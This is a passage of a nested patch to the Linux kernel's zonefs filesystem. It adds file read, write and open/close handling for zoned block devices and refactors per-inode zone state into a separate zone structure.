++	 * equal to the page size.
++	 */
++	start = iocb->ki_pos >> PAGE_SHIFT;
++	end = (iocb->ki_pos + iov_iter_count(from) - 1) >> PAGE_SHIFT;
++	if (invalidate_inode_pages2_range(inode->i_mapping, start, end))
++		return -EBUSY;
++
++	nr_pages = iov_iter_npages(from, BIO_MAX_VECS);
++	if (!nr_pages)
++		return 0;
++
++	bio = bio_alloc(bdev, nr_pages,
++			REQ_OP_ZONE_APPEND | REQ_SYNC | REQ_IDLE, GFP_NOFS);
++	bio->bi_iter.bi_sector = z->z_sector;
++	bio->bi_ioprio = iocb->ki_ioprio;
++	if (iocb_is_dsync(iocb))
++		bio->bi_opf |= REQ_FUA;
++
++	ret = bio_iov_iter_get_pages(bio, from);
++	if (unlikely(ret))
++		goto out_release;
++
++	size = bio->bi_iter.bi_size;
++	task_io_account_write(size);
++
++	if (iocb->ki_flags & IOCB_HIPRI)
++		bio_set_polled(bio, iocb);
++
++	ret = submit_bio_wait(bio);
++
++	/*
++	 * If the file zone was written underneath the file system, the zone
++	 * write pointer may not be where we expect it to be, but the zone
++	 * append write can still succeed. So check manually that we wrote where
++	 * we intended to, that is, at zi->i_wpoffset.
++	 */
++	if (!ret) {
++		sector_t wpsector =
++			z->z_sector + (z->z_wpoffset >> SECTOR_SHIFT);
++
++		if (bio->bi_iter.bi_sector != wpsector) {
++			zonefs_warn(inode->i_sb,
++				"Corrupted write pointer %llu for zone at %llu\n",
++				bio->bi_iter.bi_sector, z->z_sector);
++			ret = -EIO;
++		}
++	}
++
++	zonefs_file_write_dio_end_io(iocb, size, ret, 0);
++	trace_zonefs_file_dio_append(inode, size, ret);
++
++out_release:
++	bio_release_pages(bio, false);
++	bio_put(bio);
++
++	if (ret >= 0) {
++		iocb->ki_pos += size;
++		return size;
++	}
++
++	return ret;
++}
++
++/*
++ * Do not exceed the LFS limits nor the file zone size. If pos is under the
++ * limit it becomes a short access. If it exceeds the limit, return -EFBIG.
++ */
++static loff_t zonefs_write_check_limits(struct file *file, loff_t pos,
++					loff_t count)
++{
++	struct inode *inode = file_inode(file);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	loff_t limit = rlimit(RLIMIT_FSIZE);
++	loff_t max_size = z->z_capacity;
++
++	if (limit != RLIM_INFINITY) {
++		if (pos >= limit) {
++			send_sig(SIGXFSZ, current, 0);
++			return -EFBIG;
++		}
++		count = min(count, limit - pos);
++	}
++
++	if (!(file->f_flags & O_LARGEFILE))
++		max_size = min_t(loff_t, MAX_NON_LFS, max_size);
++
++	if (unlikely(pos >= max_size))
++		return -EFBIG;
++
++	return min(count, max_size - pos);
++}
++
++static ssize_t zonefs_write_checks(struct kiocb *iocb, struct iov_iter *from)
++{
++	struct file *file = iocb->ki_filp;
++	struct inode *inode = file_inode(file);
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	loff_t count;
++
++	if (IS_SWAPFILE(inode))
++		return -ETXTBSY;
++
++	if (!iov_iter_count(from))
++		return 0;
++
++	if ((iocb->ki_flags & IOCB_NOWAIT) && !(iocb->ki_flags & IOCB_DIRECT))
++		return -EINVAL;
++
++	if (iocb->ki_flags & IOCB_APPEND) {
++		if (zonefs_zone_is_cnv(z))
++			return -EINVAL;
++		mutex_lock(&zi->i_truncate_mutex);
++		iocb->ki_pos = z->z_wpoffset;
++		mutex_unlock(&zi->i_truncate_mutex);
++	}
++
++	count = zonefs_write_check_limits(file, iocb->ki_pos,
++					  iov_iter_count(from));
++	if (count < 0)
++		return count;
++
++	iov_iter_truncate(from, count);
++	return iov_iter_count(from);
++}
++
++/*
++ * Handle direct writes. For sequential zone files, this is the only possible
++ * write path. For these files, check that the user is issuing writes
++ * sequentially from the end of the file. This code assumes that the block layer
++ * delivers write requests to the device in sequential order. This is always the
++ * case if a block IO scheduler implementing the ELEVATOR_F_ZBD_SEQ_WRITE
++ * elevator feature is being used (e.g. mq-deadline). The block layer always
++ * automatically select such an elevator for zoned block devices during the
++ * device initialization.
++ */
++static ssize_t zonefs_file_dio_write(struct kiocb *iocb, struct iov_iter *from)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	struct super_block *sb = inode->i_sb;
++	bool sync = is_sync_kiocb(iocb);
++	bool append = false;
++	ssize_t ret, count;
++
++	/*
++	 * For async direct IOs to sequential zone files, refuse IOCB_NOWAIT
++	 * as this can cause write reordering (e.g. the first aio gets EAGAIN
++	 * on the inode lock but the second goes through but is now unaligned).
++	 */
++	if (zonefs_zone_is_seq(z) && !sync && (iocb->ki_flags & IOCB_NOWAIT))
++		return -EOPNOTSUPP;
++
++	if (iocb->ki_flags & IOCB_NOWAIT) {
++		if (!inode_trylock(inode))
++			return -EAGAIN;
++	} else {
++		inode_lock(inode);
++	}
++
++	count = zonefs_write_checks(iocb, from);
++	if (count <= 0) {
++		ret = count;
++		goto inode_unlock;
++	}
++
++	if ((iocb->ki_pos | count) & (sb->s_blocksize - 1)) {
++		ret = -EINVAL;
++		goto inode_unlock;
++	}
++
++	/* Enforce sequential writes (append only) in sequential zones */
++	if (zonefs_zone_is_seq(z)) {
++		mutex_lock(&zi->i_truncate_mutex);
++		if (iocb->ki_pos != z->z_wpoffset) {
++			mutex_unlock(&zi->i_truncate_mutex);
++			ret = -EINVAL;
++			goto inode_unlock;
++		}
++		mutex_unlock(&zi->i_truncate_mutex);
++		append = sync;
++	}
++
++	if (append) {
++		ret = zonefs_file_dio_append(iocb, from);
++	} else {
++		/*
++		 * iomap_dio_rw() may return ENOTBLK if there was an issue with
++		 * page invalidation. Overwrite that error code with EBUSY to
++		 * be consistent with zonefs_file_dio_append() return value for
++		 * similar issues.
++		 */
++		ret = iomap_dio_rw(iocb, from, &zonefs_write_iomap_ops,
++				   &zonefs_write_dio_ops, 0, NULL, 0);
++		if (ret == -ENOTBLK)
++			ret = -EBUSY;
++	}
++
++	if (zonefs_zone_is_seq(z) &&
++	    (ret > 0 || ret == -EIOCBQUEUED)) {
++		if (ret > 0)
++			count = ret;
++
++		/*
++		 * Update the zone write pointer offset assuming the write
++		 * operation succeeded. If it did not, the error recovery path
++		 * will correct it. Also do active seq file accounting.
++		 */
++		mutex_lock(&zi->i_truncate_mutex);
++		z->z_wpoffset += count;
++		zonefs_inode_account_active(inode);
++		mutex_unlock(&zi->i_truncate_mutex);
++	}
++
++inode_unlock:
++	inode_unlock(inode);
++
++	return ret;
++}
++
++static ssize_t zonefs_file_buffered_write(struct kiocb *iocb,
++					  struct iov_iter *from)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	ssize_t ret;
++
++	/*
++	 * Direct IO writes are mandatory for sequential zone files so that the
++	 * write IO issuing order is preserved.
++	 */
++	if (zonefs_inode_is_seq(inode))
++		return -EIO;
++
++	if (iocb->ki_flags & IOCB_NOWAIT) {
++		if (!inode_trylock(inode))
++			return -EAGAIN;
++	} else {
++		inode_lock(inode);
++	}
++
++	ret = zonefs_write_checks(iocb, from);
++	if (ret <= 0)
++		goto inode_unlock;
++
++	ret = iomap_file_buffered_write(iocb, from, &zonefs_write_iomap_ops);
++	if (ret > 0)
++		iocb->ki_pos += ret;
++	else if (ret == -EIO)
++		zonefs_io_error(inode, true);
++
++inode_unlock:
++	inode_unlock(inode);
++	if (ret > 0)
++		ret = generic_write_sync(iocb, ret);
++
++	return ret;
++}
++
++static ssize_t zonefs_file_write_iter(struct kiocb *iocb, struct iov_iter *from)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++
++	if (unlikely(IS_IMMUTABLE(inode)))
++		return -EPERM;
++
++	if (sb_rdonly(inode->i_sb))
++		return -EROFS;
++
++	/* Write operations beyond the zone capacity are not allowed */
++	if (iocb->ki_pos >= z->z_capacity)
++		return -EFBIG;
++
++	if (iocb->ki_flags & IOCB_DIRECT) {
++		ssize_t ret = zonefs_file_dio_write(iocb, from);
++
++		if (ret != -ENOTBLK)
++			return ret;
++	}
++
++	return zonefs_file_buffered_write(iocb, from);
++}
++
++static int zonefs_file_read_dio_end_io(struct kiocb *iocb, ssize_t size,
++				       int error, unsigned int flags)
++{
++	if (error) {
++		zonefs_io_error(file_inode(iocb->ki_filp), false);
++		return error;
++	}
++
++	return 0;
++}
++
++static const struct iomap_dio_ops zonefs_read_dio_ops = {
++	.end_io			= zonefs_file_read_dio_end_io,
++};
++
++static ssize_t zonefs_file_read_iter(struct kiocb *iocb, struct iov_iter *to)
++{
++	struct inode *inode = file_inode(iocb->ki_filp);
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	struct super_block *sb = inode->i_sb;
++	loff_t isize;
++	ssize_t ret;
++
++	/* Offline zones cannot be read */
++	if (unlikely(IS_IMMUTABLE(inode) && !(inode->i_mode & 0777)))
++		return -EPERM;
++
++	if (iocb->ki_pos >= z->z_capacity)
++		return 0;
++
++	if (iocb->ki_flags & IOCB_NOWAIT) {
++		if (!inode_trylock_shared(inode))
++			return -EAGAIN;
++	} else {
++		inode_lock_shared(inode);
++	}
++
++	/* Limit read operations to written data */
++	mutex_lock(&zi->i_truncate_mutex);
++	isize = i_size_read(inode);
++	if (iocb->ki_pos >= isize) {
++		mutex_unlock(&zi->i_truncate_mutex);
++		ret = 0;
++		goto inode_unlock;
++	}
++	iov_iter_truncate(to, isize - iocb->ki_pos);
++	mutex_unlock(&zi->i_truncate_mutex);
++
++	if (iocb->ki_flags & IOCB_DIRECT) {
++		size_t count = iov_iter_count(to);
++
++		if ((iocb->ki_pos | count) & (sb->s_blocksize - 1)) {
++			ret = -EINVAL;
++			goto inode_unlock;
++		}
++		file_accessed(iocb->ki_filp);
++		ret = iomap_dio_rw(iocb, to, &zonefs_read_iomap_ops,
++				   &zonefs_read_dio_ops, 0, NULL, 0);
++	} else {
++		ret = generic_file_read_iter(iocb, to);
++		if (ret == -EIO)
++			zonefs_io_error(inode, false);
++	}
++
++inode_unlock:
++	inode_unlock_shared(inode);
++
++	return ret;
++}
++
++/*
++ * Write open accounting is done only for sequential files.
++ */
++static inline bool zonefs_seq_file_need_wro(struct inode *inode,
++					    struct file *file)
++{
++	if (zonefs_inode_is_cnv(inode))
++		return false;
++
++	if (!(file->f_mode & FMODE_WRITE))
++		return false;
++
++	return true;
++}
++
++static int zonefs_seq_file_write_open(struct inode *inode)
++{
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	int ret = 0;
++
++	mutex_lock(&zi->i_truncate_mutex);
++
++	if (!zi->i_wr_refcnt) {
++		struct zonefs_sb_info *sbi = ZONEFS_SB(inode->i_sb);
++		unsigned int wro = atomic_inc_return(&sbi->s_wro_seq_files);
++
++		if (sbi->s_mount_opts & ZONEFS_MNTOPT_EXPLICIT_OPEN) {
++
++			if (sbi->s_max_wro_seq_files
++			    && wro > sbi->s_max_wro_seq_files) {
++				atomic_dec(&sbi->s_wro_seq_files);
++				ret = -EBUSY;
++				goto unlock;
++			}
++
++			if (i_size_read(inode) < z->z_capacity) {
++				ret = zonefs_inode_zone_mgmt(inode,
++							     REQ_OP_ZONE_OPEN);
++				if (ret) {
++					atomic_dec(&sbi->s_wro_seq_files);
++					goto unlock;
++				}
++				z->z_flags |= ZONEFS_ZONE_OPEN;
++				zonefs_inode_account_active(inode);
++			}
++		}
++	}
++
++	zi->i_wr_refcnt++;
++
++unlock:
++	mutex_unlock(&zi->i_truncate_mutex);
++
++	return ret;
++}
++
++static int zonefs_file_open(struct inode *inode, struct file *file)
++{
++	int ret;
++
++	ret = generic_file_open(inode, file);
++	if (ret)
++		return ret;
++
++	if (zonefs_seq_file_need_wro(inode, file))
++		return zonefs_seq_file_write_open(inode);
++
++	return 0;
++}
++
++static void zonefs_seq_file_write_close(struct inode *inode)
++{
++	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++	struct super_block *sb = inode->i_sb;
++	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
++	int ret = 0;
++
++	mutex_lock(&zi->i_truncate_mutex);
++
++	zi->i_wr_refcnt--;
++	if (zi->i_wr_refcnt)
++		goto unlock;
++
++	/*
++	 * The file zone may not be open anymore (e.g. the file was truncated to
++	 * its maximum size or it was fully written). For this case, we only
++	 * need to decrement the write open count.
++	 */
++	if (z->z_flags & ZONEFS_ZONE_OPEN) {
++		ret = zonefs_inode_zone_mgmt(inode, REQ_OP_ZONE_CLOSE);
++		if (ret) {
++			__zonefs_io_error(inode, false);
++			/*
++			 * Leaving zones explicitly open may lead to a state
++			 * where most zones cannot be written (zone resources
++			 * exhausted). So take preventive action by remounting
++			 * read-only.
++			 */
++			if (z->z_flags & ZONEFS_ZONE_OPEN &&
++			    !(sb->s_flags & SB_RDONLY)) {
++				zonefs_warn(sb,
++					"closing zone at %llu failed %d\n",
++					z->z_sector, ret);
++				zonefs_warn(sb,
++					"remounting filesystem read-only\n");
++				sb->s_flags |= SB_RDONLY;
++			}
++			goto unlock;
++		}
++
++		z->z_flags &= ~ZONEFS_ZONE_OPEN;
++		zonefs_inode_account_active(inode);
++	}
++
++	atomic_dec(&sbi->s_wro_seq_files);
++
++unlock:
++	mutex_unlock(&zi->i_truncate_mutex);
++}
++
++static int zonefs_file_release(struct inode *inode, struct file *file)
++{
++	/*
++	 * If we explicitly open a zone we must close it again as well, but the
++	 * zone management operation can fail (either due to an IO error or as
++	 * the zone has gone offline or read-only). Make sure we don't fail the
++	 * close(2) for user-space.
++	 */
++	if (zonefs_seq_file_need_wro(inode, file))
++		zonefs_seq_file_write_close(inode);
++
++	return 0;
++}
++
++const struct file_operations zonefs_file_operations = {
++	.open		= zonefs_file_open,
++	.release	= zonefs_file_release,
++	.fsync		= zonefs_file_fsync,
++	.mmap		= zonefs_file_mmap,
++	.llseek		= zonefs_file_llseek,
++	.read_iter	= zonefs_file_read_iter,
++	.write_iter	= zonefs_file_write_iter,
++	.splice_read	= generic_file_splice_read,
++	.splice_write	= iter_file_splice_write,
++	.iopoll		= iocb_bio_iopoll,
++};
+diff --git a/fs/zonefs/super.c b/fs/zonefs/super.c
+index a9c5c3f720adf..270ded209dde5 100644
+--- a/fs/zonefs/super.c
++++ b/fs/zonefs/super.c
+@@ -28,33 +28,47 @@
+ #include "trace.h"
+ 
+ /*
+- * Manage the active zone count. Called with zi->i_truncate_mutex held.
++ * Get the name of a zone group directory.
+  */
+-static void zonefs_account_active(struct inode *inode)
++static const char *zonefs_zgroup_name(enum zonefs_ztype ztype)
+ {
+-	struct zonefs_sb_info *sbi = ZONEFS_SB(inode->i_sb);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	switch (ztype) {
++	case ZONEFS_ZTYPE_CNV:
++		return "cnv";
++	case ZONEFS_ZTYPE_SEQ:
++		return "seq";
++	default:
++		WARN_ON_ONCE(1);
++		return "???";
++	}
++}
+ 
+-	lockdep_assert_held(&zi->i_truncate_mutex);
++/*
++ * Manage the active zone count.
++ */
++static void zonefs_account_active(struct super_block *sb,
++				  struct zonefs_zone *z)
++{
++	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+ 
+-	if (zi->i_ztype != ZONEFS_ZTYPE_SEQ)
++	if (zonefs_zone_is_cnv(z))
+ 		return;
+ 
+ 	/*
+ 	 * For zones that transitioned to the offline or readonly condition,
+ 	 * we only need to clear the active state.
+ 	 */
+-	if (zi->i_flags & (ZONEFS_ZONE_OFFLINE | ZONEFS_ZONE_READONLY))
++	if (z->z_flags & (ZONEFS_ZONE_OFFLINE | ZONEFS_ZONE_READONLY))
+ 		goto out;
+ 
+ 	/*
+ 	 * If the zone is active, that is, if it is explicitly open or
+ 	 * partially written, check if it was already accounted as active.
+ 	 */
+-	if ((zi->i_flags & ZONEFS_ZONE_OPEN) ||
+-	    (zi->i_wpoffset > 0 && zi->i_wpoffset < zi->i_max_size)) {
+-		if (!(zi->i_flags & ZONEFS_ZONE_ACTIVE)) {
+-			zi->i_flags |= ZONEFS_ZONE_ACTIVE;
++	if ((z->z_flags & ZONEFS_ZONE_OPEN) ||
++	    (z->z_wpoffset > 0 && z->z_wpoffset < z->z_capacity)) {
++		if (!(z->z_flags & ZONEFS_ZONE_ACTIVE)) {
++			z->z_flags |= ZONEFS_ZONE_ACTIVE;
+ 			atomic_inc(&sbi->s_active_seq_files);
+ 		}
+ 		return;
+@@ -62,18 +76,29 @@ static void zonefs_account_active(struct inode *inode)
+ 
+ out:
+ 	/* The zone is not active. If it was, update the active count */
+-	if (zi->i_flags & ZONEFS_ZONE_ACTIVE) {
+-		zi->i_flags &= ~ZONEFS_ZONE_ACTIVE;
++	if (z->z_flags & ZONEFS_ZONE_ACTIVE) {
++		z->z_flags &= ~ZONEFS_ZONE_ACTIVE;
+ 		atomic_dec(&sbi->s_active_seq_files);
+ 	}
+ }
+ 
+-static inline int zonefs_zone_mgmt(struct inode *inode, enum req_op op)
++/*
++ * Manage the active zone count. Called with zi->i_truncate_mutex held.
++ */
++void zonefs_inode_account_active(struct inode *inode)
+ {
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	int ret;
++	lockdep_assert_held(&ZONEFS_I(inode)->i_truncate_mutex);
+ 
+-	lockdep_assert_held(&zi->i_truncate_mutex);
++	return zonefs_account_active(inode->i_sb, zonefs_inode_zone(inode));
++}
++
++/*
++ * Execute a zone management operation.
++ */
++static int zonefs_zone_mgmt(struct super_block *sb,
++			    struct zonefs_zone *z, enum req_op op)
++{
++	int ret;
+ 
+ 	/*
+ 	 * With ZNS drives, closing an explicitly open zone that has not been
+@@ -83,201 +108,49 @@ static inline int zonefs_zone_mgmt(struct inode *inode, enum req_op op)
+ 	 * are exceeded, make sure that the zone does not remain active by
+ 	 * resetting it.
+ 	 */
+-	if (op == REQ_OP_ZONE_CLOSE && !zi->i_wpoffset)
++	if (op == REQ_OP_ZONE_CLOSE && !z->z_wpoffset)
+ 		op = REQ_OP_ZONE_RESET;
+ 
+-	trace_zonefs_zone_mgmt(inode, op);
+-	ret = blkdev_zone_mgmt(inode->i_sb->s_bdev, op, zi->i_zsector,
+-			       zi->i_zone_size >> SECTOR_SHIFT, GFP_NOFS);
++	trace_zonefs_zone_mgmt(sb, z, op);
++	ret = blkdev_zone_mgmt(sb->s_bdev, op, z->z_sector,
++			       z->z_size >> SECTOR_SHIFT, GFP_NOFS);
+ 	if (ret) {
+-		zonefs_err(inode->i_sb,
++		zonefs_err(sb,
+ 			   "Zone management operation %s at %llu failed %d\n",
+-			   blk_op_str(op), zi->i_zsector, ret);
++			   blk_op_str(op), z->z_sector, ret);
+ 		return ret;
+ 	}
+ 
+ 	return 0;
+ }
+ 
+-static inline void zonefs_i_size_write(struct inode *inode, loff_t isize)
++int zonefs_inode_zone_mgmt(struct inode *inode, enum req_op op)
+ {
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	lockdep_assert_held(&ZONEFS_I(inode)->i_truncate_mutex);
+ 
+-	i_size_write(inode, isize);
+-	/*
+-	 * A full zone is no longer open/active and does not need
+-	 * explicit closing.
+-	 */
+-	if (isize >= zi->i_max_size) {
+-		struct zonefs_sb_info *sbi = ZONEFS_SB(inode->i_sb);
+-
+-		if (zi->i_flags & ZONEFS_ZONE_ACTIVE)
+-			atomic_dec(&sbi->s_active_seq_files);
+-		zi->i_flags &= ~(ZONEFS_ZONE_OPEN | ZONEFS_ZONE_ACTIVE);
+-	}
++	return zonefs_zone_mgmt(inode->i_sb, zonefs_inode_zone(inode), op);
+ }
+ 
+-static int zonefs_read_iomap_begin(struct inode *inode, loff_t offset,
+-				   loff_t length, unsigned int flags,
+-				   struct iomap *iomap, struct iomap *srcmap)
++void zonefs_i_size_write(struct inode *inode, loff_t isize)
+ {
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	struct super_block *sb = inode->i_sb;
+-	loff_t isize;
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
+ 
+-	/*
+-	 * All blocks are always mapped below EOF. If reading past EOF,
+-	 * act as if there is a hole up to the file maximum size.
+-	 */
+-	mutex_lock(&zi->i_truncate_mutex);
+-	iomap->bdev = inode->i_sb->s_bdev;
+-	iomap->offset = ALIGN_DOWN(offset, sb->s_blocksize);
+-	isize = i_size_read(inode);
+-	if (iomap->offset >= isize) {
+-		iomap->type = IOMAP_HOLE;
+-		iomap->addr = IOMAP_NULL_ADDR;
+-		iomap->length = length;
+-	} else {
+-		iomap->type = IOMAP_MAPPED;
+-		iomap->addr = (zi->i_zsector << SECTOR_SHIFT) + iomap->offset;
+-		iomap->length = isize - iomap->offset;
+-	}
+-	mutex_unlock(&zi->i_truncate_mutex);
+-
+-	trace_zonefs_iomap_begin(inode, iomap);
+-
+-	return 0;
+-}
+-
+-static const struct iomap_ops zonefs_read_iomap_ops = {
+-	.iomap_begin	= zonefs_read_iomap_begin,
+-};
+-
+-static int zonefs_write_iomap_begin(struct inode *inode, loff_t offset,
+-				    loff_t length, unsigned int flags,
+-				    struct iomap *iomap, struct iomap *srcmap)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-	struct super_block *sb = inode->i_sb;
+-	loff_t isize;
+-
+-	/* All write I/Os should always be within the file maximum size */
+-	if (WARN_ON_ONCE(offset + length > zi->i_max_size))
+-		return -EIO;
+-
+-	/*
+-	 * Sequential zones can only accept direct writes. This is already
+-	 * checked when writes are issued, so warn if we see a page writeback
+-	 * operation.
+-	 */
+-	if (WARN_ON_ONCE(zi->i_ztype == ZONEFS_ZTYPE_SEQ &&
+-			 !(flags & IOMAP_DIRECT)))
+-		return -EIO;
++	i_size_write(inode, isize);
+ 
+ 	/*
+-	 * For conventional zones, all blocks are always mapped. For sequential
+-	 * zones, all blocks after always mapped below the inode size (zone
+-	 * write pointer) and unwriten beyond.
++	 * A full zone is no longer open/active and does not need
++	 * explicit closing.
+ 	 */
+-	mutex_lock(&zi->i_truncate_mutex);
+-	iomap->bdev = inode->i_sb->s_bdev;
+-	iomap->offset = ALIGN_DOWN(offset, sb->s_blocksize);
+-	iomap->addr = (zi->i_zsector << SECTOR_SHIFT) + iomap->offset;
+-	isize = i_size_read(inode);
+-	if (iomap->offset >= isize) {
+-		iomap->type = IOMAP_UNWRITTEN;
+-		iomap->length = zi->i_max_size - iomap->offset;
+-	} else {
+-		iomap->type = IOMAP_MAPPED;
+-		iomap->length = isize - iomap->offset;
+-	}
+-	mutex_unlock(&zi->i_truncate_mutex);
+-
+-	trace_zonefs_iomap_begin(inode, iomap);
+-
+-	return 0;
+-}
+-
+-static const struct iomap_ops zonefs_write_iomap_ops = {
+-	.iomap_begin	= zonefs_write_iomap_begin,
+-};
+-
+-static int zonefs_read_folio(struct file *unused, struct folio *folio)
+-{
+-	return iomap_read_folio(folio, &zonefs_read_iomap_ops);
+-}
+-
+-static void zonefs_readahead(struct readahead_control *rac)
+-{
+-	iomap_readahead(rac, &zonefs_read_iomap_ops);
+-}
+-
+-/*
+- * Map blocks for page writeback. This is used only on conventional zone files,
+- * which implies that the page range can only be within the fixed inode size.
+- */
+-static int zonefs_write_map_blocks(struct iomap_writepage_ctx *wpc,
+-				   struct inode *inode, loff_t offset)
+-{
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-
+-	if (WARN_ON_ONCE(zi->i_ztype != ZONEFS_ZTYPE_CNV))
+-		return -EIO;
+-	if (WARN_ON_ONCE(offset >= i_size_read(inode)))
+-		return -EIO;
+-
+-	/* If the mapping is already OK, nothing needs to be done */
+-	if (offset >= wpc->iomap.offset &&
+-	    offset < wpc->iomap.offset + wpc->iomap.length)
+-		return 0;
+-
+-	return zonefs_write_iomap_begin(inode, offset, zi->i_max_size - offset,
+-					IOMAP_WRITE, &wpc->iomap, NULL);
+-}
+-
+-static const struct iomap_writeback_ops zonefs_writeback_ops = {
+-	.map_blocks		= zonefs_write_map_blocks,
+-};
+-
+-static int zonefs_writepages(struct address_space *mapping,
+-			     struct writeback_control *wbc)
+-{
+-	struct iomap_writepage_ctx wpc = { };
+-
+-	return iomap_writepages(mapping, wbc, &wpc, &zonefs_writeback_ops);
+-}
+-
+-static int zonefs_swap_activate(struct swap_info_struct *sis,
+-				struct file *swap_file, sector_t *span)
+-{
+-	struct inode *inode = file_inode(swap_file);
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
++	if (isize >= z->z_capacity) {
++		struct zonefs_sb_info *sbi = ZONEFS_SB(inode->i_sb);
+ 
+-	if (zi->i_ztype != ZONEFS_ZTYPE_CNV) {
+-		zonefs_err(inode->i_sb,
+-			   "swap file: not a conventional zone file\n");
+-		return -EINVAL;
++		if (z->z_flags & ZONEFS_ZONE_ACTIVE)
++			atomic_dec(&sbi->s_active_seq_files);
++		z->z_flags &= ~(ZONEFS_ZONE_OPEN | ZONEFS_ZONE_ACTIVE);
+ 	}
+-
+-	return iomap_swapfile_activate(sis, swap_file, span,
+-				       &zonefs_read_iomap_ops);
+ }
+ 
+-static const struct address_space_operations zonefs_file_aops = {
+-	.read_folio		= zonefs_read_folio,
+-	.readahead		= zonefs_readahead,
+-	.writepages		= zonefs_writepages,
+-	.dirty_folio		= filemap_dirty_folio,
+-	.release_folio		= iomap_release_folio,
+-	.invalidate_folio	= iomap_invalidate_folio,
+-	.migrate_folio		= filemap_migrate_folio,
+-	.is_partially_uptodate	= iomap_is_partially_uptodate,
+-	.error_remove_page	= generic_error_remove_page,
+-	.direct_IO		= noop_direct_IO,
+-	.swap_activate		= zonefs_swap_activate,
+-};
+-
+-static void zonefs_update_stats(struct inode *inode, loff_t new_isize)
++void zonefs_update_stats(struct inode *inode, loff_t new_isize)
+ {
+ 	struct super_block *sb = inode->i_sb;
+ 	struct zonefs_sb_info *sbi = ZONEFS_SB(sb);
+@@ -310,63 +183,68 @@ static void zonefs_update_stats(struct inode *inode, loff_t new_isize)
+ }
+ 
+ /*
+- * Check a zone condition and adjust its file inode access permissions for
+- * offline and readonly zones. Return the inode size corresponding to the
+- * amount of readable data in the zone.
++ * Check a zone condition. Return the amount of written (and still readable)
++ * data in the zone.
+  */
+-static loff_t zonefs_check_zone_condition(struct inode *inode,
+-					  struct blk_zone *zone, bool warn,
+-					  bool mount)
++static loff_t zonefs_check_zone_condition(struct super_block *sb,
++					  struct zonefs_zone *z,
++					  struct blk_zone *zone)
+ {
+-	struct zonefs_inode_info *zi = ZONEFS_I(inode);
+-
+ 	switch (zone->cond) {
+ 	case BLK_ZONE_COND_OFFLINE:
+-		/*
+-		 * Dead zone: make the inode immutable, disable all accesses
+-		 * and set the file size to 0 (zone wp set to zone start).
+-		 */
+-		if (warn)
+-			zonefs_warn(inode->i_sb, "inode %lu: offline zone\n",
+-				    inode->i_ino);
+-		inode->i_flags |= S_IMMUTABLE;
+-		inode->i_mode &= ~0777;
+-		zone->wp = zone->start;
+-		zi->i_flags |= ZONEFS_ZONE_OFFLINE;
++		zonefs_warn(sb, "Zone %llu: offline zone\n",
++			    z->z_sector);
++		z->z_flags |= ZONEFS_ZONE_OFFLINE;
+ 		return 0;
+ 	case BLK_ZONE_COND_READONLY:
+ 		/*
+-		 * The write pointer of read-only zones is invalid. If such a
+-		 * zone is found during mount, the file size cannot be retrieved
+-		 * so we treat the zone as offline (mount == true case).
+-		 * Otherwise, keep the file size as it was when last updated
+-		 * so that the user can recover data. In both cases, writes are
+-		 * always disabled for the zone.
++		 * The write pointer of read-only zones is invalid, so we cannot
++		 * determine the zone wpoffset (inode size). We thus keep the
++		 * zone wpoffset as is, which leads to an empty file
++		 * (wpoffset == 0) on mount. For a runtime error, this keeps
++		 * the inode size as it was when last updated so that the user
++		 * can recover data.
+ 		 */
+-		if (warn)
+-			zonefs_warn(inode->i_sb, "inode %lu: read-only zone\n",
+-				    inode->i_ino);
+-		inode->i_flags |= S_IMMUTABLE;
+-		if (mount) {
+-			zone->cond = BLK_ZONE_COND_OFFLINE;
+-			inode->i_mode &= ~0777;
+-			zone->wp = zone->start;
+-			zi->i_flags |= ZONEFS_ZONE_OFFLINE;
+-			return 0;
+-		}
+-		zi->i_flags |= ZONEFS_ZONE_READONLY;
+-		inode->i_mode &= ~0222;
+-		return i_size_read(inode);
++		zonefs_warn(sb, "Zone %llu: read-only zone\n",
++			    z->z_sector);
++		z->z_flags |= ZONEFS_ZONE_READONLY;
++		if (zonefs_zone_is_cnv(z))
++			return z->z_capacity;
++		return z->z_wpoffset;
+ 	case BLK_ZONE_COND_FULL:
+ 		/* The write pointer of full zones is invalid. */
+-		return zi->i_max_size;
++		return z->z_capacity;
+ 	default:
+-		if (zi->i_ztype == ZONEFS_ZTYPE_CNV)
+-			return zi->i_max_size;
++		if (zonefs_zone_is_cnv(z))
++			return z->z_capacity;
+ 		return (zone->wp - zone->start) << SECTOR_SHIFT;
+ 	}
+ }
+ 
++/*
++ * Check a zone condition and adjust its inode access permissions for
++ * offline and readonly zones.
++ */
++static void zonefs_inode_update_mode(struct inode *inode)
++{
++	struct zonefs_zone *z = zonefs_inode_zone(inode);
++
++	if (z->z_flags & ZONEFS_ZONE_OFFLINE) {
++		/* Offline zones cannot be read nor written */
++		inode->i_flags |= S_IMMUTABLE;
++		inode->i_mode &= ~0777;
++	} else if (z->z_flags & ZONEFS_ZONE_READONLY) {
++		/* Readonly zones cannot be written */
++		inode->i_flags |= S_IMMUTABLE;
++		if (z->z_flags & ZONEFS_ZONE_INIT_MODE)
++			inode->i_mode &= ~0777;
++		else
++			inode->i_mode &= ~0222;
++	}
++
